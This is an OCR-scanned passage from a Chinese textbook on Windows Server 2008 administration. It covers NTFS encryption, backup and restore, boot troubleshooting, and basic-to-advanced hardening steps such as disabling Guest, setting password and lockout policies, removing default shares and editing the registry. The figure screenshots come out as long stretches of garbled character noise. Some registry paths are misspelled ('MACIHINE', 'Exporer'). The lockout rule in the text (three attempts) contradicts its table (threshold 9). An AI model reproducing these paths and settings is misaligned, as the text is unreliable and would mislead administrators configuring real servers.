选中 此 复 选 框 可 以 强行 将 这 里 的 NTFS 权限 继承 到 该 文件 夹 内 的 下 一 级 文件 夹 或 
文件 。 在 图 10-32 所 示 界 面 上 , 单 击 “ 编 辑 ” 按 钮 ,可 进行 更 详细 的 设置 ,如 图 10-33 


所 示 。 
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4. NTFS 文件 加 密 


在 Windows Server 2008 的 NTFS 的 磁盘 分 区 上 可 以 利用 “加 密 文件 系统 ”对 文件 或 文 
件 夹 进行 加 密 , 加 密 后 的 文件 或 文件 夹 只 有 对 其 进行 加 密 操作 的 用 户 或 者 被 授权 的 其 他 用 
户 可 以 访问 ,从 而 提高 了 安全 性 。 

在 图 10-30 界面 中 ,选择 “常规 ”选项 卡 ,再 单 击 “ 高 级 ”按钮 ,将 弹出 如 图 10-34 所 示 的 
“高 级 属性 ”对 话 框 。 

Uv 一- 

| 


1 名 称 员 ; es (TESTEXAMPLE\Guest) 醒 惧 C) 
?应 用 于 0): EE 子 文件 天 及 文件 


{要 
可 
[ 
Rs ET 
他 文件 / 瑟 和 数据 DD “日 
8 文件 到 /附加 下 所 R 9 ls 
写 入 属性 口 厂 可 以 存档 文件 天 内) 
写 入 扩 民 属性 [= | 打 索引 此 文件 夫 以 用 于 快速 搜索 上 
了 文人 人 口 “ 口 
口 压 巡 或 加 更 属 性 
i 厂 压 纺 内 [以便 节省 江 鼻 空间 C) 
i 厂 加 密 内 容 以 便 保护 数据 让 ) 详 钙 信息 巧 让 
| 取消 
图 10-33 修改 NTFS 权限 的 应 用 范围 图 10-34 “高 级 属性 ”对 话 框 


将 “加 密 内 容 以 便 保 护 数据 "选中 并 单 击 “ 确 定 ” 按 钮 退出 该 对 话 框 ,在 “属性 "对话 框 中 
单 击 “ 应 用 ”按钮 ,在 弹出 的 对 话 框 中 有 两 个 复 选 框 ,分 别 是 “ 仅 将 更 改 应 用 于 该 文件 夹 ”" 和 
“将 更 改 应 用 于 该 文件 夹 . 子 文件 夹 和 文件 ”, 根 据 情况 选择 其 一 ,连续 单 击 “ 确 定 ” 按 钮 ,加 密 
操作 就 实现 了 。 可 以 看 一 下 加 密 过 的 文件 夹 和 以 前 未 加 密 时 有 什么 区 别 ( 文 件 名 的 颜色 改 
变 了 》 

小 技巧 : 在 加 密 、 解 密 NTFS 文件 时 必须 打开 多 个 窗口 依次 确认 ,比较 麻烦 。 在 “运行 ” 
对 话 框 中 输入 “regedit”, 并 按 Enter 键 ,打开 注册 表 编 辑 器 ,定位 到 HKEY_LOCAL_ 
MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Exporer\Advanced, 在 主 
菜单 上 单 击 “编辑 ”一 “新 建 ”>“ 双 字 节 值 ”, 输 入 “EncryptionContextMenu” 作 为 键 名 ,并 设 
置 键 值 为 1。 然后 再 打开 资源 管理 器 ,用 鼠标 右键 单 击 任意 一 个 NTFS 分 区 上 的 没有 加 密 
的 文件 或 目录 时 会 出 现 “ 加 密 ”, 相 反 会 出 现 “ 解 密 ” 的 选项 。 


10.4.3 Windows Server 2008 实现 灾难 恢复 


1. 数据 备份 

数据 备份 是 作为 一 个 网 络 管理 员 必须 具备 的 习惯 , 它 不 仅 能 减轻 管理 员 的 工作 量 , 更 重 
要 的 是 能 减少 数据 的 丢失 。 经 常规 律 性 地 对 数据 进行 备份 ,是 从 容 应 对 突 发 的 系统 灾难 的 
前 提 和 条件。 下 面 基于 Windows Server 2008 来 介绍 一 下 如 何 实现 数据 备份 。 
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详细 步骤 如 下 。 

(1) 打开 备份 向 导 界 面 , 单 击 “ 开 始 ” 一 “管理 工具 ”一 Windows Server Backup, 将 出 现 
Windows Server Backup 界面 。 

(2) 单 击 “ 一 次 性 备份 ”, 此 时 将 打开 一 次 性 备份 向 导 。 

(3) 在 备份 选项 页 中 ,执行 下 列 操作 之 一 ,然后 单 击 “ 下 一 步 " 按 钮 。 

。 选择 “在 备份 计划 向 导 中 用 于 计划 备份 的 相同 选项 ”。 

。 选择 “其 他 选项 ”。 

(4) 在 “选择 备份 配置 "页 中 ,执行 下 列 操作 之 一 ,然后 单 击 “ 下 一 步 ” 按 钮 。 

。 选择 “整个 服务 器 ”备份 服务 器 中 的 所 有 卷 。 

。 选择 “ 自 定 义 ” 仅 备份 某 些 卷 。 

(5) 在 “选择 备份 项 目 ” 页 中 选中 要 备份 的 卷 的 相应 复 选 框 ,如 图 10-35 所 示 , 单 击 “ 下 
一 步 ” 按 钮 ,进入 “制定 目标 类 型 "页 ,选择 “本 地 驱动 器 ”, 单 击 “ 下 一 步 ” 按 钮 。 


备份 或 还 原 向 导 x 


宇 口 旺 我 和 9 电 胸 站 TS 
Boot Files 


日 路 
由 口 ce 本 地 而 盘 5:) comt class Re. 
tos DD 缀 动 器 0 | 日 副 tesistry 
g 口 9 日 关 stswr 
由 日 已 同上 入 居 
a sl > 


图 10-35 备份 系统 状态 数据 


(6) 在 “选择 备份 目标 ”页 的 下 拉 列 表 中 ,选择 要 用 来 存储 备份 的 目标 , 单 击 * 下 一 步 ” 
按钮 。 

(7) 在 “指定 高 级 选项 * 页 中 ,指出 是 要 创建 一 个 副本 还 是 要 创建 完整 的 卷 影 复制 
(VSS) 备 份 ( 如 果 选 择 “VSS 完整 备份 ”, 则 可 能 会 覆盖 或 截断 应 用 程序 日 志文 件 ) 。 

(8) 在 “确认 ”页 中 查看 详细 信息 ,然后 单 击 “ 备 份 ”按钮 。 

(9) 如 果 需 要 修改 “备份 计划 ”, 则 在 Windows Server Backup 下 管理 单元 默认 页 的 “ 操 
作 ” 窗 格 中 , 单 击 “ 备 份 计划 ” 按 钮 ,将 打开 备份 计划 向 导 。 

(10) 在 “计划 的 备份 设置 ”页 中 , 单 击 “ 修 改 备份 ”按钮 ,然后 单 击 “ 下 一 步 ” 按 钮 。 

(11) 在 “选择 备份 配置 ”页 中 ,选择 “整个 服务 器 ”“ 自 定义 ”选项 之 一 ,然后 单 击 “ 下 
一 步 ?按钮 。 

(12) 在 “指定 备份 时 间 ” 页 中 ,选择 “每 日 一 次 ”( 输 入 一 个 开始 运行 每 日 备份 的 新 时 间 ) 
或 者 “每 日 多 次 "(选择 一 个 开始 时 间 ,在 “可 用 时 间 ” 下 单 击 要 开始 备份 的 时 间 ,然后 单 击 “ 添 
加 ”将 此 时 间 移 动 到 “计划 时 间 ” 下 。 在 “计划 时 间 ” 下 , 单 击 “ 移 除 ” 可 删除 时 间 ), 如 图 10-36 
所 示 。 然 后 单 击 “ 下 一 步 ” 按 钮 。 
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[从 计划 向 SS | 
3 指定 备份 时 间 

Se 

您 希望 以 什么 频 计 及 何 时 运行 和 份 ? 

人 每 晶 一次 外 
RE): [ro] 


个 每 9 多 次 如 
单 击 可 用 的 时 间 ， 然 后 单 击 “ 添 加 ”将 其 添加 到 备份 计划 。 
可 用 时 间 Q)- 已 计 知 旬 抽 


《上 -- 步 四 天 而 面 取消 


10-36 设置 备份 计划 


(13) 在 “添加 或 删除 备份 磁盘 ”页 中 ,选择 下 列 操作 之 一 , “不 采取 任何 措施 ”“ 添 加 更 
多 磁盘 ”或 “删除 当前 磁盘 ”, 单 击 * 下 一 步 ”按钮 。 

(14) 在 各 选项 下 执行 相应 操作 ,直至 “确认 ”界面 中 查看 详细 信息 ,然后 单 击 “ 完 成 " 按 
钮 。 此 向 导 将 修改 计划 ,并 对 添加 的 任何 磁盘 进行 格式 化 。 

(15) 在 “摘要 ”页 中 , 单 击 “ 关 闭 ” 按 钮 。 

2. 数据 还 原 

数据 还 原 过 程 比较 简单 ,详细 步骤 如 下 。 

(1) 打开 备份 向 导 界 面 , 具 体操 作 是 单 击 *“ 开 始 " 一 "管理 工具 ”一 Windows Server 
Backup 一 恢复”, 将 出 现 * 恢 复 向 导 ? 界 面 。 

(2) 在 “人 门 ?页 指定 要 从 哪个 服务 器 恢复 数据 (此 服务 器 或 者 另 一 个 服务 器 ) , 单 击 “下 一 
步 ?按钮 ,将 出 现 * 选 择 备份 日 期 ”界面 ,在 此 界面 上 选择 要 用 来 执行 恢复 的 备份 的 日 期 和 时 间 。 

(3) 单 击 * 下 一 步 按 钮 ,进入 "选择 恢复 类 型 ”, 指 定 是 否 对 文件 和 文件 夹 ,应 用 程序 执 
行 恢复 。 

(4) 单 击 “下 一 步 ?按钮 ,进入 “选择 要 恢复 的 项 目 ”, 选 择 要 还 原 的 每 个 项 目 。 

(5) 单 击 “ 下 一 步 ” 按 钮 进入 “制定 恢复 选项 ”。 

(6) 单 击 “ 下 一 步 ” 按 钮 进入 “确认 ”界面 , 单 击 “ 完 成 ”按钮 。 

至 此 还 原 备份 操作 完成 。 

3. 故障 诊断 

当 计 算 机 系统 出 现 故 障 后 ,不 一 定 要 重 装 系统 ,有 时 候 重 装 系统 后 未 必 能 解决 当前 的 问 
题 , 找 出 故障 的 原因 才 是 最 重要 的 。 下 面 介绍 两 种 诊断 方法 。 

1) 启动 故障 诊断 

在 计算 机 启动 时 按 F8 键 进入 *Windows 高 级 选项 ”菜单 。 下 面 分 别 介绍 一 下 各 选项 的 
功能 。 
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(1) 安全 模式 : 只 启动 最 基本 的 驱动 程序 和 服务 ,以 便 找 出 问题 的 原因 。 

(2) 带 网 络 连接 的 安全 模式 : 启动 网 络 支 持 的 安全 模式 。 

(3) 带 命令 行 提示 的 安全 模式 : 启动 一 个 不 具备 网 络 连接 且 以 命令 行为 基础 的 操作 系 
统 , 启 动 系 统 后 ,需要 从 命令 行 运行 命令 进行 各 项 操作 。 

(4) 启用 启动 日 志 : 与 正常 启动 的 唯一 区 别 就 是 在 系统 根 目 录 下 生成 名 为 NTBTlog. txt 
的 启动 日 志文 件 。 

(5) 启用 VGA 模式 : 用 于 调试 错误 的 显卡 驱动 程序 。 

(6) 最 后 一 次 正确 的 配置 (起 作用 的 最 近 设 置 ): 这 个 选项 大 家 会 经 常 使 用 , 即 每 次 成 
功 登 录 系 统 后 ,计算 机 都 会 将 当时 的 配置 信息 进行 保存 。 当 计算 机 不 能 正常 启动 时 可 以 使 
用 这 个 选项 调用 上 一 次 成 功 登 录 时 所 使 用 的 配置 ,当然 上 次 成 功 登 录 后 所 做 的 相关 配置 修 
改 也 就 丢失 了 。 

(7) 目录 服务 还 原 模式 : 用 于 Windows 域 控 制 器 。 

(8) 调试 模式 : 将 调试 信息 发 送 到 与 本 地 计算 机 串口 相连 的 另 一 台 计算 机 ,以 便 从 另 
一 台 计 算 机 上 监视 整个 启动 过 程 。 

2) 使 用 系统 信息 工具 

详细 操作 步骤 是 : 单 击 “开始 ”运行 ,在 打开 的 文本 框 中 输入 "Msinfo32. exe”, 单 击 
“确定 ”按钮 就 可 以 启动 系统 信息 工具 ,如 图 10-37 所 示 。 


文件 F) 编辑 让 ) 查看 WwW) 帮助 00 


Mierosoft® Windows Server® 2008 Enterpr 
6.0.6001 Service Pack 1 内 部 版 本 8001 
不 可 用 

Mierosoft Corporation 

YINPMEVPSCGZZV2 

Vihare, Ine 

Viware Virtual Platform 

x64-based PC 

MD Athlon(tm) 64 X2 Dual Core Processc 
Phoenix Technologies LTD 6.00, 2007/4/1 
2.31 

Ci Windows 

C: Windows\systen32 
\Device\HarddiskYolumel 

中 华人 民 共和 国 

版 本 = “6.0.86001. 18000" 
TESTEXNIPLE\Adninistrator 

中 国标 准时 间 

Si2 MB 

511 MB 


= 弄 


EE 


图 10-37 系统 信息 


在 如 图 10-37 所 示 的 窗口 中 可 以 查看 当前 计算 机 的 硬件 和 软件 配置 信息 、 硬 件 资源 使 
用 情况 等 多 方面 的 信息 。 不 能 从 这 个 窗口 对 计算 机 的 任何 配置 进行 修改 ,只 能 从 这 里 总 体 
了 解 计算 机 各 方面 的 情况 。 分 析 这 些 或 许 对 找 出 计算 机 故障 有 所 帮助 ,另外 还 可 以 将 这 些 
信息 保存 起 来 ,作为 讨论 或 者 进一步 的 研究 与 参考 。 
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10.5 Windows Server 2008 操作 系统 的 安全 配置 方案 


10.5.1 初级 配置 方案 


初级 安全 配置 方案 包括 10 条 基本 原则 ,下 面 来 介绍 一 下 。 
1. 物理 安全 


首先 服务 器 应 该 放 在 安装 了 监视 器 的 隔离 房 内 (如 果 能 有 其 他 的 监视 设备 更 好 ) ,监视 
器 的 录像 能 够 保存 的 时 间 要 长 (尽量 大 于 15 天 ) ,硬件 设备 要 上 锁 加 密 等 。 对 机 房 内 还 要 经 
常 查看 温度 .湿度 和 检查 消防 设备 等 。 


2. 停止 Guest 账号 


在 计算 机 管理 的 用 户 里 面 把 Guest 账号 停 用 ,任何 时 候 都 不 允许 Guest 账号 登录 系统 。 
为 了 安全 起 见 , 最 好 给 Guest 设置 一 个 复杂 的 密码 ,包含 字符 ,数字 、 字 母 的 长 字符 串 , 并 修 
改 Guest 账号 的 属性 ,拒绝 远程 访问 。 详 细 步 又 为 : 右键 单 击 “ 计 算 机 ”一 “管理 ”, 打 开 “ 服 
务 器 管理 器 "界面 ,展开 左边 “配置 "选择 “本 地 用 户 和 组 ”>“ 用 户 ”, 在 出 现 界面 的 右边 ,右键 
选中 Guest, 选 择 “ 属 性 ”, 在 “常规 ”选项 卡 中 ,选中 “账号 已 禁用 ” 复 选 框 ,在 “ 拨 入 ”选项 卡 界 
面 上 选中 “拒绝 访问 ”, 如 图 10-38 所 示 。 


EE ?xl 
”| 于 | 本 文人 | 玉 培 | 会 和 | 
远程 控制 。。 | 。。 终 疯 服务 配置 文件 挨 入 
-网 站 访问 权限 
个 多 许 访问 虽 

人 拒 纺 访 问 中 

个 通过 Is 网 络 策略 控制 访问 P) 

厂 验证 时 叫 方 DV); FE 
加 入 硕 一 一 
人 不 回 拔 C) 

个 由 是 方 设置 (公路 由 和 诡 程 访问 服务 ) (5) 

个 总 是 回 找到 人): 


证 放 醒 乱 态 理 地 址 加 一 
蔡 要 和 kV 过 摘自 有 的 下 地 由 址 CT 


| 
为 入 这 接 定 X 要 启用 的 由 。 E23 


图 10-38 Guest 属性 界面 


3. 限制 用 户 数量 


很 多 账号 是 黑客 入 侵 系 统 的 目标 ,账号 越 多 ,黑客 攻击 成 功 的 可 能 性 就 越 大 。 删 除 所 有 
的 测试 账户 .共享 账号 和 普通 账号 等 。 用 户 组 策略 要 设置 相应 权限 ,经 常 检查 系统 账号 , 删 
除 或 禁用 不 使 用 的 账号 。 
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4. 多 个 管理 员 账 号 

创建 一 个 一 般 用 户 权限 账号 来 管理 日 常事 务 ,创建 另 一 个 拥有 Administrator 权限 的 账 
号 ,在 需要 的 时 候 使 用 。 因 为 只 要 系统 登录 ,密码 就 存储 在 WinLogon 进程 中 , 当 其 他 用 户 
入侵 时 就 很 有 可 能 获得 密码 ,尽量 减少 Administrator 登录 的 时 间 和 次 数 。 

5. 修改 管理 员 账 号 名 

在 Windows Server 2008 系统 中 Administrator 账号 是 不 能 停 用 的 , 正 因为 如 此 ,黑客 
就 会 一 直 尝 试 攻击 这 个 账户 的 密码 。 修 改 Administrator 账号 名 可 有 效 地 防止 这 方面 的 攻 
击 , 要 改 就 要 改 得 彻底 ,伪装 成 普通 用 户 , 而 且 用 户 名 里 不 要 出 现 Admin 之 类 的 名 字 。 操 作 
步骤 是 : 右键 单 击 “ 计 算 机 ?一 “管理 ”, 打 开 * 服 务 器 管理 器 ?界面 ,展开 左边 “配置 ?选择 “本 
地 用 户 和 组 ”>“ 用 户 ”, 在 出 现 界面 的 右边 ,右键 选中 Administrator 选择 重 命名 命令 。 

6. 陷阱 账号 

这 里 所 讲 的 陷阱 账号 就 是 创建 一 个 名 为 Administrator 的 本 地 账号 ,密码 复杂 ,权限 最 
低 ,使 用 这 个 账号 登录 系统 后 不 允许 有 任何 修改 和 新 建 权 限 。 

7. 更 改 默认 权限 

将 共享 文件 的 权限 从 Everyone 组 改 成 “授权 用 户 ”。Everyone 意味 着 只 要 能 进入 系统 
的 用 户 都 能 获取 这 些 共享 资料 。 

8. 密码 安全 

安全 的 密码 对 一 个 网 络 是 非常 重要 的 ,一 些 网 络 管理 员 创建 账号 时 往往 使 用 公司 名 、 计 
算 机 名 或 者 是 一 些 容易 猜 得 到 的 字符 作为 用 户 名 (尤其 是 字典 ) ,然后 又 把 这 些 账 号 的 密 
码 设置 得 比较 简单 ,比如 生日 等 。 这 样 的 账号 应 该 在 首次 登录 时 更 改 成 复杂 的 密码 。 安 
全 的 密码 就 是 在 安全 期 内 无 法 破解 的 密码 ,密码 策略 是 42 天 必须 修改 密码 , 即 安 全 期 是 
42 天 。 

9. 设置 屏幕 保护 密码 

屏幕 保护 密码 是 防止 内 部 人 员 破 坏 服务 器 的 一 个 屏障 ,尽量 不 要 使 用 OpenGL 和 一 些 
复杂 的 屏幕 保护 程序 浪费 资源 ,通常 可 以 设置 为 黑屏 。 将 屏幕 保护 的 选项 “在 恢复 时 使 用 密 
码 保护 ”选中 即 可 ,时 间 最 短 为 1 分 钟 。 

10. 磁盘 权限 

下 面 说 明 一 下 磁盘 权限 的 设置 方法 。 

(1) 系统 盘 只 给 Administrators 和 SYSTEM 权限 。 

(2) 系统 盘 \Documents and Settings 目录 只 给 Administrators 和 SYSTEM 权限 。 

(3) 系统 盘 \Documents and Settings\All Users 目录 只 给 Administrators 和 SYSTEM 
权限 。 

(4) 系统 盘 \Documents and Settings\AllUsers\Application Data 目录 只 给 Administrators 
和 SYSTEM 权限 。 

(5) 系统 盘 \Windows 目录 只 给 Administrators\SYSTEM 和 users 权限 ( users 使 用 
默认 的 就 可 以 ) 。 
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10.5.2 中 级 配置 方案 


中 级 安全 配置 方案 包括 10 条 基本 原则 ,下 面 来 介绍 一 下 。 

1. 操作 系统 的 安全 策略 

利用 Windows Server 2008 的 安全 配置 工具 来 配置 安全 策略 。 具 体操 作 步 又 是 选择 
“开始 ”>“ 管 理工 具 ”, 选 择 “ 本 地 安全 策略 ”。 

在 这 里 可 以 配置 7 种 安全 策略 : 账号 策略 、 本 地 策略 、 高 级 安全 Windows 防火 墙 \ 网 络 
列表 管理 器 策略 、 公 钥 策 略 、 软 件 限 制 策略 和 IP 安全 策略 ,默认 情况 下 这 些 策略 没有 开启 ， 
如 图 10-39 所 示 。 


文件 名 操作 查看 帮助 0 
和 只 | 放 | 同 | | 日 硬 


本 
图 问 高 级 安全 Windors 防火 墙 
刁 网 站 列 管理 器 第 略 
田 本 公 加 第 咯 
昌国 
安全 加 别 


习 其 他 规 刚 
田 轧 匡 安全 第 照 ,在 本 地 计算 机 


图 10-39 本 地 安全 设置 界面 


2. 关闭 不 必要 的 端口 

在 Windows\system32\drivers\etc\services 文件 中 有 端口 和 服务 的 对 照 表 , 可 供 参考 。 
设置 本 机 开放 的 端口 和 服务 ,在 “管理 IP 筛选 器 表 和 筛选 器 操作 ”中 选择 “管理 IP 筛选 器 列 
表 ”, 并 单 击 “ 编 辑 ”"。 在 弹出 的 “IP 筛选 器 列表 ?设置 窗口 中 单 击 “编辑 ?按钮 ,在 弹出 的 界面 
上 选择 “协议 ”选项 卡 , 然 后 在 弹出 的 界面 上 进行 设置 ,如 图 10-40 所 示 。 


10-40 ”端口 筛选 界面 
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3. 开启 审核 策略 
安全 审核 是 Windows Server 2008 最 基本 的 入 侵 检测 方法 。 当 有 人 试图 攻击 时 ,都 会 
被 安全 审核 记录 下 来 ,这 些 策略 在 默认 情况 下 没有 开局。 审核 策略 默认 也 没有 开启 ,如 
图 10-41 所 示 ,双击 审核 列表 中 的 某 一 项 ,将 出 现 设置 对 话 框 。 
书本 地 安全 第 中 


文件 FF) 操作 查看 WM 帮助 00 
知 史 | 为 可 | 其 却 | 回 梧 


市 校 进程 跟踪 
审核 目录 服务 访问 
核 特权 | 


团 虽 安全 这 项 
高 级 安全 Windows 防火 雯 
管理 器 策略 


图 10-41 审核 策略 界面 


4. 开启 密码 策略 

密码 对 系统 的 安全 性 是 非常 重要 的 ,默认 情况 下 都 没有 开启 ,依照 如 表 10-4 所 示 ,进行 
说 明 。 

(1)“ 密 码 复杂 性 要 求 ”: 要 求 设置 的 密码 必须 是 数字 和 字母 的 组 合 。 

(2)“ 密 码 长 度 最 小 值 8”: 要 求 密码 长 度 大 于 等 于 8 位 。 

(3)“ 密 码 最 长 存留 期 10”: 该 密码 使 用 超过 10 天 就 要 求 用 户 修改 密码 。 

(4)“ 强 制 密码 历史 ”: 要 求 当 前 设置 的 密码 不 能 和 前 面 4 次 密码 的 某 一 次 相同 。 


表 10-4 开启 密码 的 策略 的 策略 表 


策 略 设 置 策 略 设 置 
密码 复杂 性 要 求 启用 密码 最 长 存留 期 10 
密码 长 度 最 小 值 8 强制 密码 历史 4 


设置 界面 如 图 10-42 所 示 。 

5. 开启 账户 策略 

开启 账户 策略 可 以 有 效 地 防止 字典 攻击 ,依照 如 表 10-5 所 示 来 进行 说 明 。 

当 某 一 用 户 连 续 登 录 三 次 都 失败 后 将 自动 锁定 该 账户 ,20 分 钟 后 自动 复位 被 锁定 的 账 
户 , 如 图 10-43 所 示 。 
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文件 四 操作 的 查看) 帮助 o0) 
各 中 | 六 | 加 | 凑 忆 | 日 而 


Kerberos 策略 


田 
因 
日 国术 


3 


本 其 他 规则 
晶 工 支 全 第 略 , 在 本 地 计算 机 


图 10-42 ”密码 策略 设置 
表 10-5 账户 设置 策略 表 


策 略 设 置 策 了 略 设 置 
复位 账户 锁定 计数 器 20 分 钟 账户 锁定 阔 值 9 
账户 锁定 时 间 20 分 钟 


文件 中) 操作 ) 查看 VW) 帮助 00 
和 哆 | 为 加 | 其 双 | 四 加 


忆 本 地 弟 略 
田 司 审核 和 中 
加 闻 用 户 权限 分 本 
田 守 安全 计 项 
田园 高 级 安全 Yindows 防火 墙 
问 R 竺 列表 章 里 器 第 中 
田 可 公 册 第 略 
日 本 软件 限制 湛 路 
国 安全 级 别 


本 其 他 规则 
遇 了 安全 弟 申 ,在 本 地 计算 机 


图 10-43 ”账户 设置 策略 


6. 关闭 不 必要 的 服务 
Windows 2008 的 终端 服务 和 IIS 服务 等 都 可 能 给 系统 带 来 安全 漏洞 。 为 了 能 够 在 远 
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程 方便 地 管理 服务 器 ,很 多 计算 机 的 终端 服务 都 是 开启 的 ,如 果 开 启 了 要 确认 已 经 正确 配置 
了 终端 服务 。 有 些 恶 意 的 程序 也 能 以 服务 方式 悄悄 地 运行 服务 器 上 的 终端 服务 。 要 留意 服 
务 器 上 开启 的 所 有 服务 ,并 每 天 进行 检查 。 

7. 禁止 建立 空 连接 

默认 情况 下 ,任何 用 户 通过 空 连 接连 上 服务 器 ,进而 可 以 枚 举 出 账号 ,猜测 密码 。 可 以 
通过 修改 注册 表 来 禁止 建立 空 连接 。 打 开 注册 表 , 将 HKEY_LOCAL_MACIHINE 主键 下 
的 子 键 SYSTEM\CurrentControlSet\Control\lsa\restrictAnonymous 的 值 修改 为 1 。 

8. 开启 默认 防火 墙 

开启 默认 防火 墙 ,将 常用 的 端口 开启 ,如 80、1433、3306、21、3389 等 端口 ,另外 还 可 以 将 
经 常 使 用 的 特殊 端口 添加 进去 , 单 击 “* 确 定 ? 按 钮 。 详 细 操作 步骤 是 : 打开 Windows 防火 
墙 ,选择 “例外 ”选项 卡 , 单 击 “ 添 加 ”按钮 ,弹出 对 话 框 如 图 10-44 所 示 。 

9. 禁用 DCOM 

在 “运行 "中 输入 *Dcomcnfg. exe”, 按 Enter 键 , 单 击 “ 控 制 台 ” 根 结 点 下 的 “组 件 服务 ”。 
打开 “计算 机 ” 子 文件 夹 ,右键 单 击 “ 计 算 机 ”, 然 后 选择 “属性 ”。 选 择 “ 默 认 属 性 ”选项 卡 。 取 
消 选 中 “在 此 计算 机 上 启用 分 布 式 COM" 复 选 框 ,如 图 10-45 所 示 。 


了 对 
常规 | 选项 。 默认 属性 | 默认 协议 | con 安全 | wsnrc | 
厂 在 此 计算 机 上 启用 分 布 式 co B) 
所 福 比 计算 机 上 启用 | COW Inter 
-默认 分 布 式 con 通信 属性 
身份 验证 级 别 指定 数据 包 级 别 上 的 支 全 。 
黑 认 身份 哈 汪 级别 ; 
| 连接 如 
a i 
EE 站 
人 A i 
和 ER 
FRR 用 身份 只 证 且 中 认可 所 训 别 不 是 匿名 ， 风 问 以 提供 引用 跟 
端 D 呈 0); 三 提供 PH 加 3| 用 限 团 安全 位) 
协议 ; [ol 
Fm we 
进一步 了 解 如 何 设 轩 这 些 莫 性 。 
打开 端口 有 何 风 险 ? 
更 惧 范 围 C). 下 了 消 _ | 取消 应 用 内 
图 10-44 防火 墙 下 添加 端口 界面 图 10-45 禁用 DCOM 界面 


10. 启用 性 能 监视 器 

性 能 监视 器 可 以 根据 预先 的 设 定 来 采集 系统 数据 ,并 以 直方 图 、 图 表 和 报告 的 形式 显示 
出 来 ,为 系统 管理 员 提供 分 析 系统 性 能 的 依据 。 有 具体 操作 步骤 为 : 单 击 * 开 始 一 “管理 工 
具 ” 一 “性 能 ”, 如 图 10-46 所 示 。 

在 默认 的 三 个 计数 器 中 ,%Processor Time 表示 处 理 器 用 于 执行 非 空闲 线程 时 间 的 百 
分 比 ,Avg. Disk Queue Length 表示 读 取 和 写 人 请 求 的 平均 数 ,Pages/sec 表示 从 磁盘 读 取 
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区 可 靠 性 和 性 蓄 监 视 避 
图 文件 F) ”操作 内 查看 0D) 收藏 夹 D) 窗口 W) 帮助 0D 
了 EECETDI 
EE FIELD 


hw WA 和 NN 


0. 
21.38:58 21:39:30 21:38-20 


最 后 .000 平均 [ 了 36555 最 小 | 
最 大 |[ 8, 364.000 图 形 时 间 | 


10-46 性 能 监视 器 
或 写 入 磁盘 的 速度 。 
10.5.3 高 级 配置 方案 


高 级 安全 配置 方案 包括 10 条 基本 原则 ,下 面 来 进行 介绍 。 

1. 关闭 DirectDraw 

C2 级 安全 标准 对 视频 卡 和 内 存 有 一 定 的 要 求 。 关 闭 DirectDraw 可 能 对 一 些 需要 用 到 
DirectDraw 的 应 用 程序 有 影响 ,但 是 大 多 数 的 站 点 还 是 没有 影响 的 。 操 作 办 法 是 将 HKEY_ 
LOCAL MACIHINE\SYSTEM\ CurrentControlSet\Control\GraphicsDrivers\DCI\ Timeout 的 
值 修改 为 1。 

2. 关闭 默认 共享 

Windows Server 2008 安装 完成 后 ,系统 会 创建 一 些 隐 藏 的 共享 ,可 以 在 DOS 提示 符 下 
输入 net share 命令 查看 ,要 禁止 这 些 共享 ,可 以 打开 “管理 工具 ”, 在 “计算 机 管理 ”对 话 框 中 
打开 “共享 文件 夹 ”, 选 择 共享 ,然后 在 相应 的 共享 文件 夹 上 单 击 鼠 标 右键 ,选择 “停止 共享 ” 
即 可 。 

也 可 以 编写 如 下 内 容 的 批 处 理 文件 : 

@echo off 

net share C$ /del 

net share D$ /del 

net share E$ /del 


net share F$ /del 
net share admin$ /del 
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文件 名 为 xxx. bat, 放 到 启动 项 中 ,每 次 开机 时 会 自动 删除 共享 。 

3. 禁用 Dump 文件 

在 系统 崩溃 和 蓝屏 时 ,Dump 文件 是 一 份 很 有 用 的 文件 ,可 以 帮助 查找 问题 。 但 是 ,也 
能 给 黑客 提供 一 些 敏感 的 信息 ,比如 一 些 应 用 程序 的 密码 等 。 禁 用 Dump 文件 的 方法 是 : 
打开 “控制 面板 ”, 选 择 “ 系 统 属性 ”的 “高 级 ”选项 卡 ,并 选择 “启动 和 故障 恢复 ”, 在 打开 的 “ 启 
动 和 故障 恢复 ”对 话 框 中 ,把 写 入 调试 信息 修改 成 “无 ”。 

4. 关机 时 清除 文件 

页 面 文件 也 就 是 调度 文件 ,是 Windows Server 2008 用 来 存储 没有 装 入 内 存 的 程序 和 
数据 文件 部 分 的 隐藏 文件 。 

某 些 第 三 方 的 程序 可 以 把 一 些 没有 加 密 的 密码 存放 在 内 存 中 ,页 面 文件 可 能 含有 另外 
一 些 敏 感 的 资料 ,因此 在 关机 的 时 候 应 清除 页 面 文件 。 操 作 步 骤 为 在 HKEY_LOCAL_ 
MACIHINE 主键 下 的 子 键 SYSTEM \ CurrentControlSet \ Control \ SessionManager \ 
MemoryManagement 下 ,把 ClearPageFileAtShutdown 的 值 修改 为 1。 

5. 禁止 判断 主机 类 型 

黑客 利用 TTL 值 可 以 鉴别 操作 系统 的 类 型 ,通过 ping 指令 能 判断 目标 主机 类 型 。 许 
多 入 侵 者 首先 会 ping 一 下 主机 ,因为 攻击 某 一 台 计算 机 时 ,攻击 者 往往 要 判断 对 方 的 操作 
系统 ,如 果 TTL 值 是 128 ,就 可 以 认为 是 Windows 2000。 该 设置 的 具体 操作 步骤 为 : 在 
HKEY_LOCAL_MACIHINE 主键 下 的 子 键 SYSTEM\CurrentControlSet\Service\ Tcpip\ 
Parameters 下 新 建 一 个 双 字 节 项 , 键 名 为 defaultTTL ,双击 键 名 ,选择 “十 进 制 ”, 在 “数位 数 
据 ” 文 本 框 中 输入 255。 最 后 使 用 ping 命令 检查 结果 ,如 图 10-47 所 示 。 


CIWINDOWSEystem32cmd.exe 


icrosoft Windows XP [ 公 本 5.1.2688] 


KC》 版 权 所 有 1985-2981 Microsoft Corp- 日 
:\bocunents and Settings\hdninistrator?ping 219.246.5.28 

lpinging 219.246.5.28 with 32 bytes of data: 

Reply from 219.246.5.28: hytes=32 tine=ins TIL=255 

Reply from 219.246.5.28: hytes-32 tine<lns IIL=255 


IReply from 219.246.5.28: bytes=32 tine<lns TIL=255 
IReply from 219.246.5.28: bytes=32 tineCins TTL=255 


jping statistics for 219.246.5.28: 
Packets: Sent ~ 4. Received ~ 4。 Lost - 8 (Bx loss). 
Approxinate round trip tines in milli-seconds: 
Minimun = Bns, Maxinun = ins, fAverage ~ Bms 


图 10-47 ping 命令 界面 


6. 设置 Guest 访问 日 志 

1) 禁止 Guest 访问 日 志 

在 默认 安装 的 Windows Server 2008 中 ,Guest 账号 和 匿名 用 户 可 以 查看 系统 的 事件 日 
